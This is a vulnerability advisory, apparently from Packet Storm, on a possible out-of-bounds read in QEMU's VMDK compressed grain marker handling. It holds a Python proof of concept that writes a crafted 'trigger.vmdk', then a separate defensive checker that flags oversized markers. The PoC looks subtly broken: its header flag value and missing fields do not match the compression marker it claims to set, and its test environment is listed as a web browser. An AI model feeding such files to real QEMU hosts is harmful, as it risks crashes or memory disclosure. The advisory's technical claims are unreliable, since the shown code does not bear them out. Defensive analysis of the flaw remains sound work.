QEMU VMDK Out-Of-Bounds Read

Reported by indoushka, 24 Feb 2026
Type: packetstorm
Source: packetstorm.news (106 views)

Improper bounds validation in VMDK grain marker handling may cause out-of-bounds read.

=============================================================================================================================================
| # Title     : Improper Bounds Validation in VMDK Grain Marker Handling Leading to Potential Out-of-Bounds Read                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : No standalone download available                                                                                            |
=============================================================================================================================================

[+] Summary    : A flaw may exist in the handling of compressed grain markers within the VMDK monolithicSparse format.
                 If the size field in a grain marker is not properly validated against the remaining cluster boundary (excluding the marker header size),
                 the decompression routine may process more data than safely available. This can potentially result in an out-of-bounds read condition due to improper bounds checking.
                 The issue stems from failing to ensure that the declared compressed data size does not exceed the actual buffer space after accounting for
                 the marker structure. Proper validation of marker size, boundary checks, and strict decompression limits are required to prevent memory safety violations.

[+] POC   :

import struct

def create_malicious_vmdk(filename):

    # VMDK4 header fields, little-endian, padded to one 512-byte sector
    magic = b"KDMV"
    version = struct.pack("<I", 1)
    flags = struct.pack("<I", 3) # VMDK4_COMPRESSION_MARKER
    capacity = struct.pack("<Q", 2048)
    granularity = struct.pack("<Q", 128)
    desc_offset = struct.pack("<Q", 1)
    desc_size = struct.pack("<Q", 1)
    rg_size = struct.pack("<I", 1)
    gd_offset = struct.pack("<Q", 0)

    header = magic + version + flags + capacity + granularity + \
             desc_offset + desc_size + rg_size + gd_offset
    header = header.ljust(512, b'\x00')

    # grain marker: 64-bit LBA followed by 32-bit compressed size
    lba = struct.pack("<Q", 0)

    # declared size equals the whole 64 KiB cluster, leaving no room for the marker header
    malicious_size = 64 * 1024
    size = struct.pack("<I", malicious_size)

    marker = lba + size

    # minimal zlib stream, padded out to the declared size
    data = b"\x78\x9c\x03\x00\x00\x00\x00\x01"
    data = data.ljust(malicious_size, b'\x41')

    with open(filename, "wb") as f:
        f.write(header)
        f.write(marker)
        f.write(data)

    print(f"[*] Created malicious file: {filename}")
    print(f"[*] Marker size set to: {malicious_size} bytes")

if __name__ == "__main__":
    create_malicious_vmdk("trigger.vmdk")

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
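A defender-side check for the condition the summary describes, added here as an example that is not part of the original advisory or of QEMU's own code: it parses the 12-byte grain marker (64-bit LBA plus 32-bit compressed size, the layout the PoC writes) and rejects any marker whose declared size exceeds the cluster minus the marker header. The granularity offset (20) follows the VMDK4 header layout; the sample image builder and its values are constructed for the test.

```python
import struct

SECTOR_SIZE = 512
MARKER_HEADER_SIZE = 12  # u64 LBA + u32 compressed size (the 12-byte marker the PoC writes)


def validate_grain_marker(marker: bytes, cluster_size: int) -> tuple[bool, int, int]:
    """Bound a compressed grain marker's declared size against its cluster.

    Returns (ok, declared, available). The marker header occupies the first
    12 bytes of the cluster, so at most cluster_size - 12 bytes of compressed
    data can follow it; anything larger is rejected before decompression."""
    if len(marker) < MARKER_HEADER_SIZE:
        raise ValueError("truncated grain marker")
    _lba, declared = struct.unpack_from("<QI", marker, 0)
    available = cluster_size - MARKER_HEADER_SIZE
    return declared <= available, declared, available


def check_vmdk_image(image: bytes) -> list[str]:
    """Walk a monolithicSparse-style image (512-byte header, then markers at
    sector-aligned offsets) and report markers that do not fit their cluster."""
    if image[:4] != b"KDMV":
        return ["not a VMDK4 image (bad magic)"]
    (granularity,) = struct.unpack_from("<Q", image, 20)  # in sectors
    if granularity == 0:
        return ["granularity is zero; no valid cluster size"]
    cluster_size = granularity * SECTOR_SIZE
    findings, off = [], SECTOR_SIZE
    while off + MARKER_HEADER_SIZE <= len(image):
        ok, declared, available = validate_grain_marker(
            image[off:off + MARKER_HEADER_SIZE], cluster_size)
        if not ok:
            findings.append(f"marker at 0x{off:x}: declared {declared} > available {available}")
            break  # an untrusted size must not be used to advance
        if declared == 0:
            break  # size 0 denotes a metadata marker (EOS/GT/GD); out of scope here
        off += MARKER_HEADER_SIZE + declared
        off = (off + SECTOR_SIZE - 1) // SECTOR_SIZE * SECTOR_SIZE  # next cluster
    return findings


def sample_image(granularity: int, declared_size: int) -> bytes:
    """Constructed test input: minimal VMDK4-style header plus one marker (hypothetical)."""
    header = (b"KDMV" + struct.pack("<IIQQ", 1, 0, 2048, granularity)).ljust(SECTOR_SIZE, b"\x00")
    return header + struct.pack("<QI", 0, declared_size) + bytes(declared_size)
```

With the PoC's values (granularity 128, declared size 65536) the checker reports the marker at offset 0x200 as exceeding the 65524 bytes available in its cluster.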


Vulners record (24 Feb 2026 00:00, current)
Risk: 5.5 (Medium)
Vulners AI Score: 5.5
CVSS 3.1: 5.1
EPSS: 0.00019
Views: 106